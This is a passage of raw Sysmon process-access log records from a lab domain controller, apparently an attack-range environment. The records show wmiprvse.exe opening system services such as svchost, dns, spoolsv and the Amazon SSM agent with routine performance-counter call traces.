Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 